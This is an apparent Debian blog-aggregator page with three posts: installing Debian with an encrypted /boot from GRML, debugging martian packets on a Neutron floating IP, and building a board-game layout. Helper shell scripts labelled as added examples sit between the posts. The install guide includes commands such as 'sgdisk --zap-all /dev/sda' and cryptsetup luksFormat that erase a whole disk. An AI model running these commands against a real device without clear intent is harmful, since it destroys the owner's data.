21 March, 2019 08:30PM by simon

Birger Schacht

Installing Debian with encrypted boot using GRML

A couple of days ago an interesting step-by-step guide on how to install Debian with full disk encryption, including /boot, using debian-installer was posted on the debian-boot mailing list. This reminded me of the steps I used and wrote down a couple of months ago to create a similar setup. These steps describe a full disk (including /boot) encrypted setup on a non-coreboot-enabled system using the great grml live distro. (And just to be sure I just redid the same setup on a test device with the newest grml release Gnackwatschn):

The first step was to set up the network using grml-network after which I started by preparing the disk. I wiped the disk's old partition table using sgdisk(8) and then created a 512MB EFI System partition and used the rest of the disk for a Linux partition:

sgdisk --zap-all /dev/sda
sgdisk -n1:1M:+512M -t1:EF00 /dev/sda
sgdisk -n2:0:0 -t2:8300 /dev/sda

Then I initialized the LUKS partition, set a passphrase and opened the LUKS device:

cryptsetup luksFormat /dev/sda2
cryptsetup luksOpen /dev/sda2 sda2_crypt

The LUKS device is then used to create an LVM volume group which in this example is called vg-2560p. In that volume group I created a logical volume for the root (/) filesystem:

pvcreate /dev/mapper/sda2_crypt
vgcreate vg-2560p /dev/mapper/sda2_crypt
lvcreate -L 120G vg-2560p -n root

The next step was to create an ext4 filesystem on the root volume and a msdos filesystem with a 32bit file allocation table and the label EFI on the EFI System partition:

mkfs.ext4 /dev/vg-2560p/root
mkdosfs -F 32 -n EFI /dev/sda1

I then mounted the root partition, debootstrapped buster onto the partition, mounted the EFI partition and remounted /dev, /proc, /sys and /run into the new system:

mount /dev/vg-2560p/root /mnt
debootstrap buster /mnt http://deb.debian.org/debian
mkdir /mnt/boot/efi
mount /dev/sda1 /mnt/boot/efi
mount --rbind /dev /mnt/dev/
mount --rbind /proc /mnt/proc
mount --rbind /sys /mnt/sys
mount --rbind /run /mnt/run

After that I used chroot(8) to change into the buster installation and do some initial configuration. I first told apt(8) not to install recommended packages and then installed a kernel, grub, cryptsetup, lvm2 and sudo:

chroot /mnt /bin/bash
echo "Apt::Install-Recommends 0;" >> /etc/apt/apt.conf.d/local-recommends
apt install linux-image-amd64 cryptsetup lvm2 grub-efi-amd64 sudo

On the new system, the /etc/fstab file is empty and so I added the filesystems and I also added information about the encrypted disk to the /etc/crypttab file:

echo PARTUUID=$(blkid -s PARTUUID -o value /dev/sda1) /boot/efi vfat nofail,x-systemd.device-timeout=1 0 1 >> /etc/fstab
echo UUID=$(blkid -s UUID -o value /dev/mapper/vg--2560p-root) / ext4 defaults 0 1 >> /etc/fstab
echo sda2_crypt PARTUUID=$(blkid -s PARTUUID -o value /dev/sda2) none luks,discard,initramfs >> /etc/crypttab

I also had to tell grub to enable device decryption:

echo "GRUB_ENABLE_CRYPTODISK=y" >> /etc/default/grub
update-initramfs -c -k all
update-grub
grub-install --target=x86_64-efi

The final step, which I forget nearly every time I install a system using debootstrap(8), was to add a user account:

adduser bisco
adduser bisco sudo

PS: On the laptop I installed a couple of months ago, I had to set the path to the EFI GRUB file (\EFI\debian\grubx64.efi) in the BIOS. On the laptop I used to reproduce the above steps, I didn't find that setting in the BIOS (it's from 2011, maybe a BIOS update would have helped), but I was able to choose the file during boot.

21 March, 2019 06:28PM
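For the encrypted-/boot install in the post above, a set of checks to run inside the chroot before the first reboot, as an added example that is not part of the original post. The function names are made up here; the LUKS version check assumes GRUB 2.02 (the version in buster), which can only open LUKS1 headers, while newer cryptsetup releases create LUKS2 by default.

```shell
#!/bin/sh
# Added example (not from the post): checks to run before the first reboot.
# All function names here are made up for this example.

# True if the last GRUB_ENABLE_CRYPTODISK assignment in FILE ($1) is "y".
grub_cryptodisk_enabled() {
    val=$(sed -n 's/^[[:space:]]*GRUB_ENABLE_CRYPTODISK=//p' "$1" |
          tail -n 1 | tr -d "\"'[:space:]")
    [ "$val" = "y" ]
}

# True if mapping NAME ($2) in crypttab FILE ($1) lists OPTION ($3).
crypttab_has_option() {
    awk -v name="$2" -v opt="$3" '
        $1 ~ /^#/ || NF < 4 { next }
        $1 == name {
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) if (o[i] == opt) found = 1
        }
        END { exit !found }' "$1"
}

# Print the header version from "cryptsetup luksDump" output on stdin.
luks_version() { awk '$1 == "Version:" { print $2; exit }'; }

# preflight GRUB_DEFAULTS CRYPTTAB MAPPING LUKSDUMP_FILE
# Prints one line per problem and returns non-zero if any check failed.
preflight() {
    rc=0
    grub_cryptodisk_enabled "$1" ||
        { echo "FAIL: GRUB_ENABLE_CRYPTODISK=y not set in $1"; rc=1; }
    for opt in luks initramfs; do
        crypttab_has_option "$2" "$3" "$opt" ||
            { echo "FAIL: $3 lacks '$opt' in $2"; rc=1; }
    done
    ver=$(luks_version < "$4")
    [ "$ver" = "1" ] ||
        { echo "FAIL: LUKS version '$ver'; GRUB 2.02 only unlocks LUKS1"; rc=1; }
    return $rc
}

# Constructed sample input so the checks can be tried anywhere.
d=$(mktemp -d)
echo 'GRUB_ENABLE_CRYPTODISK=y' > "$d/grub"
echo 'sda2_crypt PARTUUID=constructed none luks,discard,initramfs' > "$d/crypttab"
printf 'Version:\t2\n' > "$d/luksdump"   # LUKS2 header: preflight must fail
preflight "$d/grub" "$d/crypttab" sda2_crypt "$d/luksdump" || echo "do not reboot yet"
rm -r "$d"
```

On the installed system the inputs would be /etc/default/grub, /etc/crypttab, the mapping name sda2_crypt and the saved output of cryptsetup luksDump /dev/sda2.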

Arturo Borrero González

The martian packet case in our Neutron floating IP setup

Networking

A community member opened a bug the other day related to a weird networking behavior in the Cloud VPS service, offered by the Cloud Services team at Wikimedia Foundation. This VPS hosting service is based on Openstack, and we implement the networking bits by means of Neutron.

Our current setup is based on Openstack Mitaka (old, I know) and the networking architecture we use is extensively described in our docs. What is interesting today is our floating IP setup, which Neutron uses by means of the Netfilter NAT engine.

Neutron creates a couple of NAT rules for each floating IP, to implement both SNAT and DNAT. In our setup, if a VM uses a floating IP, then all its traffic to and from The Internet will use this floating IP. In our case, the floating IP range is made of public IPv4 addresses.

WMCS neutron setup

The bug/weird behavior consisted of the VM being unable to contact itself using the floating IP. A packet is generated in the VM with the floating IP as its destination address, like this:

172.16.0.148 > 185.15.56.55 ICMP echo request

This packet reaches the neutron virtual router, and I could see it in tcpdump:

root@neutron-router:~# tcpdump -n -i qr-defc9d1d-40 icmp and host 172.16.0.148
11:51:48.652815 IP 172.16.0.148 > 185.15.56.55: ICMP echo request, id 32318, seq 1, length 64

Then the PREROUTING NAT rule applies, translating 185.15.56.55 into 172.16.0.148. The corresponding conntrack NAT engine event:

root@neutron-router:~# conntrack -E -p icmp --src 172.16.0.148
    [NEW] icmp     1 30 src=172.16.0.148 dst=185.15.56.55 type=8 code=0 id=32395 [UNREPLIED] src=172.16.0.148 dst=172.16.0.148 type=0 code=0 id=32395

When this happens, the packet is put on the wire again, and I could see it again in a tcpdump running on the Neutron server box. You can see the 2 packets, the first without NAT, the second with the NAT applied:

root@neutron-router:~# tcpdump -n -i qr-defc9d1d-40 icmp and host 172.16.0.148
11:51:48.652815 IP 172.16.0.148 > 185.15.56.55: ICMP echo request, id 32318, seq 1, length 64
11:51:48.652842 IP 172.16.0.148 > 172.16.0.148: ICMP echo request, id 32318, seq 1, length 64

The Neutron virtual router routes this packet back to the original VM, and you can see the NATed packet reaching the interface. Note how I selected only incoming packets in tcpdump using -Q in:

root@vm-instance:~# tcpdump -n -i eth0 -Q in icmp
11:51:48.650504 IP 172.16.0.148 > 172.16.0.148: ICMP echo request, id 32318, seq 1, length 64

And here is the thing. That packet can’t be routed by the VM:

root@vm-instance:~# ip route get 172.16.0.148 from 172.16.0.148 iif eth0
RTNETLINK answers: Invalid argument

This is known as a martian packet and you can actually see the kernel complaining if you turn on martian packet logging:

root@vm-instance:~# sysctl net.ipv4.conf.all.log_martians=1
root@vm-instance:~# dmesg -T | tail -2
[Tue Mar 19 12:16:26 2019] IPv4: martian source 172.16.0.148 from 172.16.0.148, on dev eth0
[Tue Mar 19 12:16:26 2019] ll header: 00000000: fa 16 3e d9 29 75 fa 16 3e ae f5 88 08 00        ..>.)u..>.....

The problem is that, for a local IP address, we receive a packet with the same src/dst IPv4 address but different src/dst MAC addresses. That’s nonsense to the network stack unless it is configured otherwise. If one wants to instruct the network stack to allow this, the fix is pretty easy:

root@vm-instance:~# sysctl net.ipv4.conf.all.accept_local=1

Now, ping from the VM to the floating IP works:

root@vm-instance:~# ping 185.15.56.55
PING 185.15.56.55 (185.15.56.55) 56(84) bytes of data.
64 bytes from 172.16.0.148: icmp_seq=1 ttl=64 time=0.202 ms
64 bytes from 172.16.0.148: icmp_seq=2 ttl=64 time=0.228 ms
^C
--- 185.15.56.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1011ms
rtt min/avg/max/mdev = 0.202/0.215/0.228/0.013 ms

And ip route reports it correctly:

root@vm-instance:~# ip route get 172.16.0.148 from 172.16.0.148 iif eth0
local 172.16.0.148 from 172.16.0.148 dev lo 
    cache <local>  iif eth0

You can read more about all the sysctl configs for networking in the Linux kernel docs. In particular, this one:

accept_local - BOOLEAN
	Accept packets with local source addresses. In combination with
	suitable routing, this can be used to direct packets between two
	local interfaces over the wire and have them accepted properly.
	default FALSE

The Cloud VPS service offered by the Wikimedia Foundation is an open project, open to use by anyone connected with the Wikimedia movement, and we encourage the community to work with us in improving it. Yes, it is open to collaboration as well, including from technical / engineering contributors, and you are welcome to contribute to this or any of the many other collaborative efforts in this global movement.

21 March, 2019 08:00AM
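Since accept_local relaxes a source-address check, it helps to confirm that the martians being logged really are the hairpin kind shown in the post above (source equal to destination, frame sent by a different MAC) before changing it. The following is an added example, not part of the original post; the function names are made up and the third log line is constructed.

```shell
#!/bin/sh
# Added example: classify kernel martian-source log lines read from stdin.
# Output per martian: KIND DEV SRC DST SRC_MAC, where KIND is "hairpin" when
# the source address equals the destination (the floating IP case), else "other".
classify_martians() {
    awk '
    function emit(mac) { print kind, dev, src, dst, mac; pending = 0 }
    /martian source/ {
        if (pending) emit("-")          # previous entry had no ll header line
        # kernel wording: "martian source <dst> from <src>, on dev <if>"
        i = 1; while ($i != "source" && i < NF) i++
        dst = $(i + 1); src = $(i + 3); sub(/,$/, "", src); dev = $NF
        kind = (src == dst) ? "hairpin" : "other"
        pending = 1; next
    }
    pending && /ll header:/ {
        # Ethernet header bytes: 6 destination MAC, 6 source MAC, 2 ethertype
        i = 1; while ($i != "header:" && i < NF) i++
        mac = $(i + 8)
        for (j = i + 9; j <= i + 13; j++) mac = mac ":" $j
        emit(mac); next
    }
    END { if (pending) emit("-") }'
}

# True if stdin contains at least one hairpin martian.
has_hairpin() { classify_martians | grep -q '^hairpin '; }

# The first two lines are the dmesg output quoted in the post; the last is constructed.
sample_log() {
    cat <<'EOF'
[Tue Mar 19 12:16:26 2019] IPv4: martian source 172.16.0.148 from 172.16.0.148, on dev eth0
[Tue Mar 19 12:16:26 2019] ll header: 00000000: fa 16 3e d9 29 75 fa 16 3e ae f5 88 08 00        ..>.)u..>.....
[Tue Mar 19 12:17:02 2019] IPv4: martian source 172.16.0.148 from 127.0.0.1, on dev eth0
EOF
}

sample_log | classify_martians
```

On a live system, pipe dmesg -T into classify_martians after enabling log_martians; a hairpin line whose source MAC is the Neutron router's port matches the case described in the post.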

Ian Jackson

Pandemic Rising Tide - a new board design

As I wrote previously (link added here):
ceb gave me the board game Pandemic Rising Tide for Christmas. I like it a lot. However, the board layout, while very pretty and historically accurate, is awkward for play. I decided to produce a replacement board design, with a schematic layout.

This project is now complete at last! Not only do I have PDFs ready for printing on a suitable printer, but I have made a pretty good properly folding actual board.

Why a new board design

The supplied board is truly a work of art. Every wrinkle in the coastline and lots of details of boundaries of various parts of the Netherlands are faithfully reproduced.

To play the game, though, it is necessary to see quickly which "squares" (faces of the boundary graph; the rules call them regions) are connected to which others, and what the fastest walking route is, and so on. Also one places dyke tokens - small brown sticks - along some of the edges; it is often necessary to quickly see whether a face has any dykes on any of its edges, or whether there is a dyke between two adjacent faces.

This is hard to do on the original board. There has been at least one forum thread and one player shared their modifications involving pipe cleaners and glue!

Results - software, and PDFs

Much of the work in this project was producing the image to go on the board - in particular, laying out the graph was quite hard and involved shaving a number of yaks. (I'll be posting properly about my planar graph layout tool too.)

In case you like my layout, I have published a complete set of PDFs suitable for printing out yourself. There's a variety depending on what printer you are going to use. See the README.txt in that directory for details.

Of course the source code is available too. (Building it is not so easy - see the same README for details.)

Results - physical board

I consulted with ceb who had very useful bookbinding expertise and gave copious and useful advice, and also very kindly let me use some of their supplies. I had a local print shop print out a suitable PDF on their excellent A1 colour laserprinter, with very good results. (The photos below don't do justice to the colour rendering.)

The whole board is backed with bookcloth (the cloth which is used for the spines of hardback books), and that backing forms one of the two hinges. The other hinge is a separate piece of bookcloth on the top face. Then on top of that is the actual board image sheet, all put on in one go (so it all aligns correctly) and then cut along the "convex" hinge after the glue was dry.

I did some experiments to get the hang of the techniques and materials, and to try out a couple of approaches. Then I wrote myself a set of detailed instruction notes, recalculated the exact sizes, and did a complete practice run at 1/sqrt(8) scale. That served me well.

The actual construction took most of a Saturday afternoon and evening, and then the completed board had to be pressed for about 48h while it dried, to stop it warping.

There was one part that it wasn't really practical to practice: actually pasting a 624 x 205mm sheet of 120gsm paper, covered in a mixture of PVA and paste, onto a slightly larger arrangement of boards, is really quite tricky to do perfectly - even if you have a bookbinder on hand to help with another pair of hands. So if you look closely at my finished article you can see some blemishes. But, overall, I am pleased.

Pictures

If you just want to admire my board design, you can look at this conveniently sized PDF. I also took some photographs. But, for here, a taster:




21 March, 2019 01:02AM